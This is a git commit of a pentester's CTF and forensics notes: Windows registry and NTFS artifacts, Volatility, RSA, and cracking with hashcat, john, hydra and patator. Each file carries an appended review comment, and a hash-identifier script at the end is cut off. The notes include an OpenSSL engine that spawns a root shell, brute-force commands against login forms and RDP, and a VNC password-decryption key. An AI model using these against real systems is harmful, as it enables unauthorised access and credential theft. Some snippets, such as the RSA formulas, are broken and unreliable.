further restructuring

This commit is contained in:
Stefan Friese 2022-11-12 23:18:06 +01:00
parent 980fdf6242
commit 996f65fa61
43 changed files with 2029 additions and 0 deletions

View File

@ -0,0 +1,44 @@
# OpenSSL Engine
* Hook external libs
* [OpenSSL blog](https://www.openssl.org/blog/blog/2015/10/08/engine-building-lesson-1-a-minimum-useless-engine/)
* Most minimal example
```C
#include <openssl/engine.h>
static int bind(ENGINE *e, const char *id)
{
return 1;
}
IMPLEMENT_DYNAMIC_BIND_FN(bind)
IMPLEMENT_DYNAMIC_CHECK_FN()
```
* Shell as root
```C
#include <openssl/engine.h>
#include <unistd.h>
static int bind(ENGINE *e, const char *id)
{
setuid(0);
setgid(0);
system("/bin/bash");
}
IMPLEMENT_DYNAMIC_BIND_FN(bind)
IMPLEMENT_DYNAMIC_CHECK_FN()
```
* Compile
```C
gcc -fPIC -o rootshell.o -c rootshell.c
gcc -shared -o rootshell.so -c -lcrytpo rootshell.o
```
* Execute via
```sh
openssl engine -t `pwd`/rootshell.so
```
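Review bot: the `bind` function in the "Shell as root" block is declared `int` but has no `return` statement (the minimal example above it returns 1), which is undefined behaviour in C; add `return 1;` after the `system()` call. The "Compile" block is tagged `C` although it contains shell commands, so tag it `sh` like the "Execute via" block, and the second gcc line has two defects: `-lcrytpo` is a typo for `-lcrypto`, and `-c` stops after compilation so no shared object is linked at all; the link step should be `gcc -shared -o rootshell.so rootshell.o -lcrypto`.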

View File

@ -0,0 +1,23 @@
# OpenSSL Cheatsheet
## Extract keys from PFX Cert
* Key and cert form PFX
```sh
openssl pkcs12 -in cert.pfx -nocerts -out key.pem -nodes
openssl pkcs12 -in cert.pfx -out cert.pem -clcerts -nokeys
```
## Extract & Repack PFX Cert
* Extract & Repack with another password, e.g. from `mimikatz` to `cqure`
```sh
openssl pkcs12 -in *.pfx -out temp.pem -nodes
openssl pkcs12 -export -out *.pfx -in temp.pem
```
## Generate Certificate
```sh
openssl req -new -x509 -keyout cert.pem -out cert.pem -days 365 -nodes
```
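Review bot: typo in the first bullet, "Key and cert form PFX" should read "from PFX". In the "Extract & Repack" block the glob `*.pfx` is used both for `-in` and for `-out`; for `-out` the shell either passes a literal `*.pfx` or expands it to an existing file that is then overwritten, so name the files explicitly (`-in old.pfx`, `-out new.pfx`). The bullet mentions the passwords `mimikatz` and `cqure` but the commands never show where they go; state that the first command prompts for the import password and the `-export` command for the new one, or pass them with `-passin pass:…` and `-passout pass:…`.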

36
Cryptography/RSA.md Normal file
View File

@ -0,0 +1,36 @@
# RSA
* `p * q = n`
* Coprime Phi is calculated either by [Euler Totient](https://en.wikipedia.org/wiki/Euler's_totient_function) or [greatest common divisor](https://en.wikipedia.org/wiki/Greatest_common_divisor) via [euclidean algorithm](https://crypto.stanford.edu/pbc/notes/numbertheory/euclid.html)
* \\(1 < $\phi$ < n \\)
* There is also $\phi$ = (p-1) * (q-1)
* Encryption, public key `e` is a prime between 2 and phi --> \\( 2 < e < $\phi$ \\)
```python
possible_e = []
for i in range (2, phi):
if gcd(n, i) == 1 and gcd(phi, i) == 1:
possible_e.append()
```
* Decryption, private key `d` --> \\( d * e mod $\phi$ = 1 \\)
```python
possible_d = []
for i in range (phi + 1, phi + foo):
if i * e mod phi == 1 :
possible_d.append()
```
* \\( Cipher = msg ** d mod $\phi$ \\)
* \\( Cleartext = cipher ** e mod $\phi$ )
## Euklid
```python
def gcd(a, b):
if b == 0:
return a
return gcd(b, a % b)
```
## Links
* [Encryption+Decryption](https://www.cs.drexel.edu/~jpopyack/Courses/CSP/Fa17/notes/10.1_Cryptography/RSA_Express_EncryptDecrypt_v2.html)
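Review bot: the encryption and decryption formulas are wrong in two ways: both reduce modulo $\phi$ instead of modulo `n`, and the key roles are swapped. With the definitions above, encryption is `cipher = msg ** e mod n` and decryption is `msg = cipher ** d mod n`; $\phi$ appears only in the key-generation condition `d * e mod phi = 1` and must stay secret. Describing `e` as "a prime between 2 and phi" is stronger than required, `e` only has to be coprime to $\phi$, so the `gcd(n, i)` test in the first snippet is redundant. Neither Python snippet runs as written: `possible_e.append()` and `possible_d.append()` are missing the argument `i`, `i * e mod phi == 1` is not Python (`(i * e) % phi == 1`), `foo` is undefined (the inverse lies in `range(2, phi)`, or use `pow(e, -1, phi)` on Python 3.8+), and `gcd` is called before it is defined under "Euklid" (spell it "Euclid"). The math mixes `\\( … \\)` delimiters with `$\phi$`, and the `Cleartext` line is missing its closing `\\)`; pick one delimiter style.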

23
Forensics/Kape.md Normal file
View File

@ -0,0 +1,23 @@
# Kroll Artifact Parser
* Collect and processes artifacts on windows
* Collects from live systems, mounted images and F-response tool
## Targets
* Needs source and target directory, as well as a module to process the files on
* `Target` copies a file into a repository
* `*.tkape` files contains metadata of the files to copy
* `Compound Targets` contain metadata of multiple files in order to get a result quicker
* `!Disable` do not appear in the target list
* `!Local` keep on local
## Modules
* Used on the targeted files
* `*.mkape` files
* Additional binaries are kept in `bin`
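Review bot: grammar and vagueness in the description bullets: "Collect and processes artifacts on windows" should read "Collects and processes artifacts on Windows", "`*.tkape` files contains" should be "contain", and "Needs source and target directory, as well as a module to process the files on" does not say what the module acts on; say that KAPE needs a source directory, a destination directory and, optionally, modules that run over the collected files. The `!Disable` and `!Local` bullets give no context for what these names are (target names, directory names?) or what "keep on local" means; add one sentence each.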

48
Forensics/NTFS.md Normal file
View File

@ -0,0 +1,48 @@
# NTFS
* Has the following advantages over FAT
* Journaling
* ACL
* Volume Shadow Copy
* Alternate Data Stream
## Master File Table
* VBR references to `$MFT`
* `$LOGFILE` stores transactions of the file system
* `$UsnJrnl` changed files, and reason for change
## Caching
* File information is cached for frequent use in
```sh
C:\Windows\Prefetch\*.pf
```
* An SQLite database can be found under
```sh
C:\Users\<username>\AppData\Local\ConnectedDevicesPlatform\{randomfolder}\ActivitiesCache.db
```
## Jumplist
* Stores recently used files of applications inside the taskbar
```sh
C:\Users\<username>\AppData\Roaming\Microsoft\Windows\Recent\AutomaticDestinations
```
## Shortcut Files
```sh
C:\Users\<username>\AppData\Roaming\Microsoft\Windows\Recent\
C:\Users\<username>\AppData\Roaming\Microsoft\Office\Recent\
```
## Internet Explorer History
```sh
C:\Users\<username>\AppData\Local\Microsoft\Windows\WebCache\WebCacheV*.dat
```
## Removeable Device Setup Log
```sh
C:\Windows\inf\setupapi.dev.log
```
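Review bot: typo in the last heading, "Removeable" should read "Removable". The bullets under "Master File Table" are fragments: "VBR references to `$MFT`" should say that the volume boot record points to the location of `$MFT`, and "`$UsnJrnl` changed files, and reason for change" should say that `$UsnJrnl` records which files changed and the reason for each change. The path blocks are tagged `sh` although they hold Windows paths rather than shell commands; a neutral tag such as `text` avoids implying they can be run. The "Caching" heading does not describe either artifact under it (a Prefetch directory and `ActivitiesCache.db`, which the bullets describe quite differently); give each its own heading.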

28
Forensics/OLEtools.md Normal file
View File

@ -0,0 +1,28 @@
# oletools & Vmonkey
* Analyze ooxml and ole2 files
* [oletools repo](https://github.com/decalage2/oletools.git)
## Usage
* Check content of a stream
```sh
oledump.py file.doc -Ss <No. of stream>
oledump.py file.doc -Ss <No. of stream> -v
```
```sh
oledump.py -i file.doc
```
```sh
olevba file.doc
```
## Vipermonkey
* For the lazy ones
```sh
vmonkey file.doc
```
## scdbg
* [scdbg repo](https://github.com/dzzie/SCDBG.git)
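Review bot: missing documentation for two of the three usage blocks: `oledump.py -i file.doc` and `olevba file.doc` have no bullet saying what they do, while the single bullet "Check content of a stream" only covers the `-Ss` commands. Add a bullet per block (what `-i` lists, what `olevba` extracts, what `-v` adds to the stream dump). The `scdbg` section is a link only; state what it is used for in this workflow or leave it out until there is usage to record. The first usage block calls `oledump.py`, which is not named in the heading or the repo link above; link its source next to the oletools repo so a reader knows where to get it.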

7
Forensics/References.md Normal file
View File

@ -0,0 +1,7 @@
## Forensics References
## Volatility
[volatility](https://github.com/volatilityfoundation/volatility.git)
[volatility3](https://github.com/volatilityfoundation/volatility3.git)
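Review bot: heading levels are inconsistent with the other reference file in this commit: `Hashes/References.md` opens with a top-level `# Hashes References`, while this file uses `## Forensics References` followed by `## Volatility` at the same level, so the title does not nest its section. Use `# Forensics References` here.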

91
Forensics/Volatility.md Normal file
View File

@ -0,0 +1,91 @@
# Volatility
Search through collected volatile memory dumps, volume and VM images.
Volatility and Volatility 3 have a different syntax. The older one has
higher malware hunting abilities.
* [Cheat sheet](https://downloads.volatilityfoundation.org/releases/2.4/CheatSheet_v2.4.pdf)
* [Hacktricks shee](https://book.hacktricks.xyz/forensics/volatility-examples)
* [Symbol table for Linux and macOS](https://github.com/volatilityfoundation/volatility3#symbol-tables)
## Basic Commands
* Basic Info, find OS profile
```sh
volatility -f <file.iso> imageinfo
volatility -f <file.iso> kdbgscan
```
* Process list
```sh
volatility -f <file.iso> --profile <OSprofile> pslist
```
* List dlls
```sh
volatility -f <file.iso> --profile <OSprofile> dlllist -p <PID>
```
* Last accessed dir
```sh
volatility -f <file.iso> --profile <OSprofile> shellbags
```
### Volatility3
* Basic Info works too, but you have to know the kind of OS anyway
```sh
volatility -f <file.iso> windows.info
```
* Process list, but processes can be hidden. Therefore use ` psscan `
```sh
volatility -f <file.iso> windows.pslist
volatility -f <file.iso> windows.psscan
volatility -f <file.iso> windows.pstree
```
* List dlls, this includes the path of the file
```sh
volatility -f <file.iso> windows.dlllist
```
* Find malicious files, fileless and including files, respectively
```sh
volatility -f <file.iso> windows.malfind
volatility -f <file.iso> windows.vadyarascan
```
* Dump memory map
```sh
volatility -f <file.iso> windows.memmap.Memmap --pid <pid> --dump
```
* Dump and scan files
```sh
windows.dumpfiles.DumpFiles Dumps cached file contents from Windows memory
windows.filescan.FileScan Scans for file objects present in a particular windows. Lists version information from PE files.
```
* Find file handles or mutex
```sh
volatility -f <file.iso> windows.mutex
```
* Malware hunting through hooking
```sh
windows.ssdt.SSDT Lists the system call table. # System Service Descriptor Table
windows.driverirp.DriverIrp List IRPs for drivers in a particular windows memory image.
windows.modules.Modules Lists the loaded kernel modules.
windows.driverscan.DriverScan Scans for drivers present in a particular windows
```
## Plugins
Volatility 3 plugins are named after the specific profile they are used for.
For the most part these are (` macOS.*, windows.*, linux.* `)
* For example
* Truecryptpassphrase
* cmdscan, command history
* shutdowntime
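Review bot: typo in the links, "Hacktricks shee" should read "Hacktricks sheet". The "Dump and scan files" and "Malware hunting through hooking" blocks paste plugin help text instead of commands, unlike every other block, which shows a full `volatility -f <file.iso> …` invocation; the `windows.filescan.FileScan` line has also run two help entries together ("present in a particular windows. Lists version information from PE files."), so its second sentence belongs to a different plugin. Turn each line into a runnable command with a one-line comment. The "Plugins" section says Volatility 3 plugins carry an OS prefix (`windows.*`, `linux.*`, `macOS.*`) and then lists `Truecryptpassphrase`, `cmdscan` and `shutdowntime` without one, so it is unclear whether these are Volatility 2 or 3 names; label them. The `<file.iso>` placeholder is misleading for a memory dump; `<memory.dmp>` reads better. The intro's "higher malware hunting abilities" is vague; say which plugins Volatility 2 has that 3 lacks, or drop the claim.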

View File

@ -0,0 +1,119 @@
# Windows Registry
## Regedit Keys
* HKEY_CURRENT_USER (HKCU), inside HKU
* HKEY_USERS (HKU)
* HKEY_LOCAL_MACHINE (HKLM)
* HKEY_CLASSES_ROOT (HKCR), stored in HKLM and HKU
* `HKEY_CURREN_USER\Software\Classes` for settings of interactive user
* `HKEY_LOCAL_MACHINE\Software\Classes` to change default settings
* HKEY_CURRENT_CONFIG
## Paths
* `C:\Windows\System32\Config`
* Default -> `HKEY_USERS\DEFAULT`
* SAM -> `HKEY_LOCAL_MACHINE\SAM`
* SECURITY -> `HKEY_LOCAL_MACHINE\Security`
* SOFTWARE -> `HKEY_LOCAL_MACHINE\Software`
* SYSTEM -> `HKEY_LOCAL_MACHINE\System`
* `C:\Users\<username>\`
* NTUSER.DAT -> `HKEY_CURRENT_USER` , hidden file
* `C:\Users\<username>\AppData\Local\Microsoft\Windows`
* USRCLASS.DAT -> `HKEY_CURRENT_USER\Sofware\CLASSES`, hidden file
* `C:\Windows\AppCompat\Programs\Amcache.hve`
### Transaction Logs
* Transaction `<name of registry hive>.LOG` of the registry hive
* Saved inside the same directory which is `C:\Windows\System32\Config`, as the hive which was altered.
### Backups
* Saved every ten days
* Look out for recently deleted or modified keys
* `C:\Windows\System32\Config\RegBack`
## Data Acquisition
* Tools
* [Autopsy](https://www.autopsy.com/)
* [FTK Imager](https://www.exterro.com/ftk-imager), does not copy `Amcache.hve`
* [KAPE](https://www.kroll.com/en/services/cyber-risk/incident-response-litigation-support/kroll-artifact-parser-extractor-kape), preserves directory tree
* `Registry Viewer`
* `Zimmerman's Registry Explorer`, uses transaction logs as well
* ` AppCompatCache Parser`
* `RegRipper`, cli and gui
## System Information
* OS Version -> `SOFTWARE\Microsoft\Windows NT\CurrentVersion`
* Computer Name -> `SYSTEM\CurrentControlSet\Control\ComputerName\ComputerName`
* Time Zone `SYSTEM\CurrentControlSet\Control\TimeZoneInformation`
* Network Interfaces -> `SYSTEM\CurrentControlSet\Services\Tcpip\Parameters\Interfaces`
* Past connected networks -> `SOFTWARE\Microsoft\Windows NT\CurrentVersion\NetworkList\Signatures\Unmanaged` and `SOFTWARE\Microsoft\Windows NT\CurrentVersion\NetworkList\Signatures\Managed`
* Services -> `SYSTEM\CurrentControlSet\Services`
* Service will start at boot with `start` key value `0x02`
* Users, SAM -> `SAM\Domains\Account\Users`
### Control Sets
* `ControlSet001` -> last boot
* `ControlSet002` -> last known good
* `HKLM\SYSTEM\CurrentControlSet` -> live
* Can be found under:
* `SYSTEM\Select\Current` shows the used control set
* `SYSTEM\Select\LastKnownGood`
## Autostart Programs
* `NTUSER.DAT\Software\Microsoft\Windows\CurrentVersion\Run`
* `NTUSER.DAT\Software\Microsoft\Windows\CurrentVersion\RunOnce`
* `SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce`
* `SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer\Run`
* `SOFTWARE\Microsoft\Windows\CurrentVersion\Run`
## Recent Files
* `NTUSER.DAT\Software\Microsoft\Windows\CurrentVersion\Explorer\RecentDocs`, e.g. xml, pdf, jpg
* Office files -> `NTUSER.DAT\Software\Microsoft\Office\VERSION`, `NTUSER.DAT\Software\Microsoft\Office\15.0\Word`
* Office 365 -> `NTUSER.DAT\Software\Microsoft\Office\VERSION\UserMRU\LiveID_####\FileMRU`
## ShellBags
* `USRCLASS.DAT\Local Settings\Software\Microsoft\Windows\Shell\Bags`
* `USRCLASS.DAT\Local Settings\Software\Microsoft\Windows\Shell\BagMRU`
* `NTUSER.DAT\Software\Microsoft\Windows\Shell\BagMRU`
* `NTUSER.DAT\Software\Microsoft\Windows\Shell\Bags`
## Last Open/Saved/Visited Dialog MRUs
* `NTUSER.DAT\Software\Microsoft\Windows\CurrentVersion\Explorer\ComDlg32\OpenSavePIDlMRU`
* `NTUSER.DAT\Software\Microsoft\Windows\CurrentVersion\Explorer\ComDlg32\LastVisitedPidlMRU`
## Explorer Address/Search Bars
* `NTUSER.DAT\Software\Microsoft\Windows\CurrentVersion\Explorer\TypedPaths`
* `NTUSER.DAT\Software\Microsoft\Windows\CurrentVersion\Explorer\WordWheelQuery`
## User Assist
* GUI applications launched by the user
* `NTUSER.DAT\Software\Microsoft\Windows\Currentversion\Explorer\UserAssist\{GUID}\Count`
## Shim Cache
* Application Compatibility, AppCompatCache
* `SYSTEM\CurrentControlSet\Control\Session Manager\AppCompatCache`
* Use `AppCompatCacheParser.exe --csv <path to save output> -f <path to SYSTEM hive for data parsing> -c <control set to parse>`
### AmCache
* Information about recently run applications on the system
* `C:\Windows\appcompat\Programs\Amcache.hve`
* Last executed app -> `Amcache.hve\Root\File\{Volume GUID}\`
* Saves SHA1 of the last executed app
## Background Activity Monitor/Desktop Activity Moderator BAM/DAM
* Saves full path of executed apps
* `SYSTEM\CurrentControlSet\Services\bam\UserSettings\{SID}`
* `SYSTEM\CurrentControlSet\Services\dam\UserSettings\{SID}`
## Devices
* Identification
* USB -> `SYSTEM\CurrentControlSet\Enum\USBTOR`, `SYSTEM\CurrentControlSet\Enum\USB`
* Device name -> `SOFTWARE\Microsoft\Windows Portable Devices\Devices`
* First time connected -> `SYSTEM\CurrentControlSet\Enum\USBSTOR\Ven_Prod_Version\USBSerial#\Properties\{83da6326-97a6-4088-9453-a19231573b29}\0064`
* Last time connected -> `SYSTEM\CurrentControlSet\Enum\USBSTOR\Ven_Prod_Version\USBSerial#\Properties\{83da6326-97a6-4088-9453-a19231573b29}\0066`
* Last removal time -> `SYSTEM\CurrentControlSet\Enum\USBSTOR\Ven_Prod_Version\USBSerial#\Properties\{83da6326-97a6-4088-9453-a19231573b29}\0067`
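Review bot: several key paths contain typos that will not resolve when copied: `HKEY_CURREN_USER\Software\Classes` (missing T), `HKEY_CURRENT_USER\Sofware\CLASSES` (missing t), and `SYSTEM\CurrentControlSet\Enum\USBTOR` under "Devices", while the three timestamp bullets directly below spell it `USBSTOR`. The Amcache path is listed twice (`C:\Windows\AppCompat\Programs\Amcache.hve` under "Paths" and again under "AmCache"); keep it once and refer to it. Under "System Information", "Time Zone" is the only item without the `->` separator, and the "Services" bullet mixes key and value: say that `Start` is the value name under the service key and `0x02` means automatic start at boot.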

32
Forensics/iOS.md Normal file
View File

@ -0,0 +1,32 @@
# iOS Devices
## Trust Certificates
* Exchanged between 'Trusted' devices and the charging iOS device.
* iTunes access to the iOS device has elevated permissions using the cert.
* Keychain may be extracted through iTunes.
## Interesting Files
* `ResetCounter.plist`, hard Reset diagnostic counter
* `com.apple.preferences.datetime.plist`
* DB tables
* Atendee
* Task
* Event
* Mail
* Safari
* Cookies
* Pictures
* Addressbook
* SMS
* Voicemail
* WiFi Keys
## Backups
Encrypted and unencrypted backups can be chosen in the iTunes menu.
## Tools
* [iFunbox](https://www.i-funbox.com/en/page-about-us.html)
* [O.MG cable](https://shop.hak5.org/products/o-mg-cable)
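Review bot: typo in the DB tables list, "Atendee" should read "Attendee", and "hard Reset diagnostic counter" has a stray capital. The "Trust Certificates" bullets are vague: "Exchanged between 'Trusted' devices and the charging iOS device" does not say what is exchanged or when the exchange happens, and "iTunes access to the iOS device has elevated permissions using the cert" does not say which operations that enables. "Keychain may be extracted through iTunes" should state whether this depends on the encrypted/unencrypted backup choice mentioned under "Backups".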

View File

@ -0,0 +1,23 @@
# Patator Bruteforcing
* [Lanjelot's Repo](https://github.com/lanjelot/patator/)
## Modules
* Available modules can be found under `patator --help`
* Module specifics can be found via `patator <module> -h`
## Using a Module
* For example `http_fuzz` can be used via
```sh
TARGET_IP=10.0.47.11
CSRF=$(curl -s -c stored.cookie "${IP}/login.php" | awk -F 'value=' '/user_token/ {print $2}' | cut -d "'" -f2)
SESSION_ID=$(grep PHPSESSID stored.cookie | awk -F ' ' '{print $7}')
echo "The CSRF is: $CSRF"
echo "The PHPSESSID is: $SESSION_ID"
patator.py http_fuzz method=POST --threads=64 timeout=10 url="http://${TARGET_IP}/login.php" 0=passwords.txt body="username=admin&password=FILE0&Login=Login&user_token=${CSRF}" header="Cookie: PHPSESSID=${SESSION_ID}; security=impossible" -x quit:fgrep!=login.php -x ignore:fgrep='Location: login.php' -x
```
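Review bot: logic problem in the example block: `TARGET_IP` is assigned on the first line but the curl call uses `${IP}`, which is never set, so the request goes to a bare `/login.php` with no host and `CSRF` stays empty; use `"http://${TARGET_IP}/login.php"` (the scheme is also missing). The `patator.py http_fuzz …` line ends in a dangling `-x` with no argument, so the command as written is incomplete; either finish that last rule or remove the flag. Minor: the bullets above call the tool `patator` while the block calls `patator.py`; use one name.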

6
Hashes/Haiti.md Normal file
View File

@ -0,0 +1,6 @@
# haiti
* Hash Identifier
```sh
haiti <hash>
```

24
Hashes/Hashcat.md Normal file
View File

@ -0,0 +1,24 @@
# Hashcat Utilities
* [Modes](https://hashcat.net/wiki/doku.php?id=example_hashes)
## Wordlists
* Combine wordlists
```sh
combinator wordlist.txt otherwordlist.txt > newwordlist.txt
```
* Create wordlist
```sh
hashcat --force <input.txt> -r /opt/hashcat/rules/best64.rule --stdout > wordlist.txt
```
## Using Masks
* A mask can be set instead of a wordlist, this charset is then brute forced by iterating the charset
* [Masks](https://hashcat.net/wiki/doku.php?id=mask_attack)
* Bruteforcing seven lowerspace characters using `SHA2-384` as an example
```sh
hashcat -m 10800 -a 3 hash.out ?l?l?l?l?l?l?l
```
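Review bot: typo in the mask bullet, "lowerspace" should read "lowercase", which is what `?l` selects. "A mask can be set instead of a wordlist, this charset is then brute forced by iterating the charset" is a comma splice that repeats itself; "A mask replaces the wordlist: hashcat iterates every combination of the given charset" says the same. The "Create wordlist" bullet should say what the command does (applies the `best64` rule set to `<input.txt>` and writes the mutated candidates), since `--stdout` is what makes hashcat emit candidates instead of cracking.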

View File

@ -0,0 +1,37 @@
# Hydra usage
## Examples
* HTTP post form
```sh
hydra -l <username> -P <wordlist> MACHINE_IP http-post-form "/:username=^USER^&password=^PASS^:F=incorrect" -V
```
* HTTP basic auth
```sh
hydra -l bob -P /usr/share/seclists/Passwords/Leaked-Databases/rockyou.txt -f 10.10.167.239 http-get /protected
```
|Command|Description|
|-------|-----------|
|`hydra -P <wordlist> -v <ip> <protocol>`|Brute force against a protocol of your choice|
|`hydra -v -V -u -L <username list> -P <password list> -t 1 -u <ip> <protocol>`|You can use Hydra to bruteforce usernames as well as passwords. It will loop through every combination in your lists. (-vV = verbose mode, showing login attempts)|
|`hydra -t 1 -V -f -l <username> -P <wordlist> rdp://<ip>`|Attack a Windows Remote Desktop with a password list.|
|`hydra -l <username> -P .<password list> $ip -V http-form-post '/wp-login.php:log=^USER^&pwd=^PASS^&wp-submit=Log In&testcookie=1:S=Location'`|Craft a more specific request for Hydra to brute force.|
## Parameter
|Option|Decription|
|------|----------|
|-l|Single username|
|-P|Indicates use the following wordlist|
|http-post-form|indicates the method|
|/login url|the login URL|
|:username|the form field where the username is entered|
|^USER^|tells Hydra to use the username from -l|
|password|the formfield where the password is entered|
|^PASS^|tells Hydra to use the wordlist from -P|
|Login|indicates to Hydra the login failed message|
|Login failed|is the login failure message that the form returns|
|F=incorrect|If this word appears on the page, login failed|
|-V| verbose|
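Review bot: typo in the table header, "Decription" should read "Description". In the command table, the second row passes `-u` twice (`-u -L <username list> … -t 1 -u <ip>`), and the last row has a stray dot in `-P .<password list>` and an unset `$ip` where the earlier rows use `MACHINE_IP` or `<ip>`; make the placeholders consistent. The module is spelled `http-post-form` in the first example and `http-form-post` in the last table row; use one spelling throughout. In the parameter table the rows `Login`, `Login failed` and `F=incorrect` describe the failure string three ways and only the last one matches the `:F=incorrect` syntax used in the example; keep the `F=<string>` row and drop or rewrite the other two.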

View File

@ -0,0 +1,43 @@
# John The Ripper
* [Formats](http://pentestmonkey.net/cheat-sheet/john-the-ripper-hash-formats)
# Usage
* Example
```sh
john --wordlist=/usr/share/seclists/Passwords/Leaked-Databases/rockyou.txt ./hash.txt --format=raw-sha256 --fork=2
```
## Declaring Structure
* List subformat
```sh
john --list=subformats
```
```sh
john --wordlist=/usr/share/seclists/Passwords/Leaked-Databases/rockyou.txt ./hash.txt --format=dynamic_85 --fork=2
```
## Rules
* [Rule syntax](https://www.openwall.com/john/doc/RULES.shtml)
* Create a local rules file, e.g. `/etc/john-local.conf` or `/usr/share/john/john-local.conf`
* Create config for mutations, e.g. border mutation
```sh
[List.Rules:border]
$[0-9]$[0-9]
```
* Run john with parameter `--rules=border`
### Existing Rules
* `l33t`, l33tsp34k
* `NT`, case mutation
* Example for `best64`
```sh
john --wordlist=single_password.txt --rules=best64 --stdout > out.txt
```
### Subformats
* Some salted passwords need dynamic rules
```sh
john --list=subformats
```
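Review bot: heading levels are inconsistent: `# Usage` is a second top-level heading after `# John The Ripper`, while every following section uses `##`; make it `## Usage`. `john --list=subformats` appears twice, under "Declaring Structure" and again under "Subformats", and neither says what `--format=dynamic_85` in the example stands for; merge the two sections and add a one-line note. The rules block (`[List.Rules:border]`) is a john.conf fragment, not a shell command, so its fence should not be tagged `sh`; the "Existing Rules" bullets for `l33t` and `NT` would also read better with the same `--rules=<name>` example form used for `best64`.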

View File

@ -0,0 +1,6 @@
# VNC Password Decoding
* Found passwords in vnc config files may be decoded via
```sh
echo -n "<key>" | xxd -r -p | openssl enc -des-cbc --nopad --nosalt -K 5AB2CDC0BADCAF13F1 -iv 0000000000000000 -d | hexdump -Cv
```
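Review bot: grammar in the bullet, "Found passwords in vnc config files may be decoded via" should read "Passwords found in VNC config files may be decoded via". In the command, the `-K` value `5AB2CDC0BADCAF13F1` is 18 hex digits (9 bytes) while DES takes an 8-byte key, so OpenSSL uses only the first 16 digits and warns that the hex string is too long; verify the key value before relying on this line. The options `--nopad` and `--nosalt` are written with a double dash while the rest of the line uses single-dash OpenSSL style (`-K`, `-iv`, `-d`); make them consistent.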

View File

@ -0,0 +1,8 @@
# sucrack
* [Repo](https://github.com/hemp3l/sucrack.git)
* Upload to target and build
```sh
sucrack -u <username> -w 100 <wordlist>
```

19
Hashes/References.md Normal file
View File

@ -0,0 +1,19 @@
# Hashes References
## Password and Username Generation
[exrex](https://github.com/asciimoo/exrex.git)
[namely](https://github.com/OrielOrielOriel/namely.git)
## Password Cracking
[Colabcat](https://github.com/someshkar/colabcat.git)
## Default Passwords
[default-password](https://default-password.info)
[datarecovery](https://datarecovery.com/rd/default-passwords/)
## Wordlist Manager
[wordlistctl](https://github.com/BlackArch/wordlistctl.git)

592
Hashes/Scripts/hash-id.py Normal file
View File

@ -0,0 +1,592 @@
#!/usr/bin/env python
# encoding: utf-8
# Hash Identifier
# By Zion3R
# www.Blackploit.com
# Root@Blackploit.com
from builtins import input
from sys import argv, exit
version = 1.2
logo=''' #########################################################################
# __ __ __ ______ _____ #
# /\ \/\ \ /\ \ /\__ _\ /\ _ `\ #
# \ \ \_\ \ __ ____ \ \ \___ \/_/\ \/ \ \ \/\ \ #
# \ \ _ \ /'__`\ / ,__\ \ \ _ `\ \ \ \ \ \ \ \ \ #
# \ \ \ \ \/\ \_\ \_/\__, `\ \ \ \ \ \ \_\ \__ \ \ \_\ \ #
# \ \_\ \_\ \___ \_\/\____/ \ \_\ \_\ /\_____\ \ \____/ #
# \/_/\/_/\/__/\/_/\/___/ \/_/\/_/ \/_____/ \/___/ v'''+str(version)+''' #
# By Zion3R #
# www.Blackploit.com #
# Root@Blackploit.com #
#########################################################################'''
algorithms={"102020":"ADLER-32", "102040":"CRC-32", "102060":"CRC-32B", "101020":"CRC-16", "101040":"CRC-16-CCITT", "104020":"DES(Unix)", "101060":"FCS-16", "103040":"GHash-32-3", "103020":"GHash-32-5", "115060":"GOST R 34.11-94", "109100":"Haval-160", "109200":"Haval-160(HMAC)", "110040":"Haval-192", "110080":"Haval-192(HMAC)", "114040":"Haval-224", "114080":"Haval-224(HMAC)", "115040":"Haval-256", "115140":"Haval-256(HMAC)", "107080":"Lineage II C4", "106025":"Domain Cached Credentials - MD4(MD4(($pass)).(strtolower($username)))", "102080":"XOR-32", "105060":"MD5(Half)", "105040":"MD5(Middle)", "105020":"MySQL", "107040":"MD5(phpBB3)", "107060":"MD5(Unix)", "107020":"MD5(Wordpress)", "108020":"MD5(APR)", "106160":"Haval-128", "106165":"Haval-128(HMAC)", "106060":"MD2", "106120":"MD2(HMAC)", "106040":"MD4", "106100":"MD4(HMAC)", "106020":"MD5", "106080":"MD5(HMAC)", "106140":"MD5(HMAC(Wordpress))", "106029":"NTLM", "106027":"RAdmin v2.x", "106180":"RipeMD-128", "106185":"RipeMD-128(HMAC)", "106200":"SNEFRU-128", "106205":"SNEFRU-128(HMAC)", "106220":"Tiger-128", "106225":"Tiger-128(HMAC)", "106240":"md5($pass.$salt)", "106260":"md5($salt.'-'.md5($pass))", "106280":"md5($salt.$pass)", "106300":"md5($salt.$pass.$salt)", "106320":"md5($salt.$pass.$username)", "106340":"md5($salt.md5($pass))", "106360":"md5($salt.md5($pass).$salt)", "106380":"md5($salt.md5($pass.$salt))", "106400":"md5($salt.md5($salt.$pass))", "106420":"md5($salt.md5(md5($pass).$salt))", "106440":"md5($username.0.$pass)", "106460":"md5($username.LF.$pass)", "106480":"md5($username.md5($pass).$salt)", "106500":"md5(md5($pass))", "106520":"md5(md5($pass).$salt)", "106540":"md5(md5($pass).md5($salt))", "106560":"md5(md5($salt).$pass)", "106580":"md5(md5($salt).md5($pass))", "106600":"md5(md5($username.$pass).$salt)", "106620":"md5(md5(md5($pass)))", "106640":"md5(md5(md5(md5($pass))))", "106660":"md5(md5(md5(md5(md5($pass)))))", "106680":"md5(sha1($pass))", "106700":"md5(sha1(md5($pass)))", 
"106720":"md5(sha1(md5(sha1($pass))))", "106740":"md5(strtoupper(md5($pass)))", "109040":"MySQL5 - SHA-1(SHA-1($pass))", "109060":"MySQL 160bit - SHA-1(SHA-1($pass))", "109180":"RipeMD-160(HMAC)", "109120":"RipeMD-160", "109020":"SHA-1", "109140":"SHA-1(HMAC)", "109220":"SHA-1(MaNGOS)", "109240":"SHA-1(MaNGOS2)", "109080":"Tiger-160", "109160":"Tiger-160(HMAC)", "109260":"sha1($pass.$salt)", "109280":"sha1($salt.$pass)", "109300":"sha1($salt.md5($pass))", "109320":"sha1($salt.md5($pass).$salt)", "109340":"sha1($salt.sha1($pass))", "109360":"sha1($salt.sha1($salt.sha1($pass)))", "109380":"sha1($username.$pass)", "109400":"sha1($username.$pass.$salt)", "1094202":"sha1(md5($pass))", "109440":"sha1(md5($pass).$salt)", "109460":"sha1(md5(sha1($pass)))", "109480":"sha1(sha1($pass))", "109500":"sha1(sha1($pass).$salt)", "109520":"sha1(sha1($pass).substr($pass,0,3))", "109540":"sha1(sha1($salt.$pass))", "109560":"sha1(sha1(sha1($pass)))", "109580":"sha1(strtolower($username).$pass)", "110020":"Tiger-192", 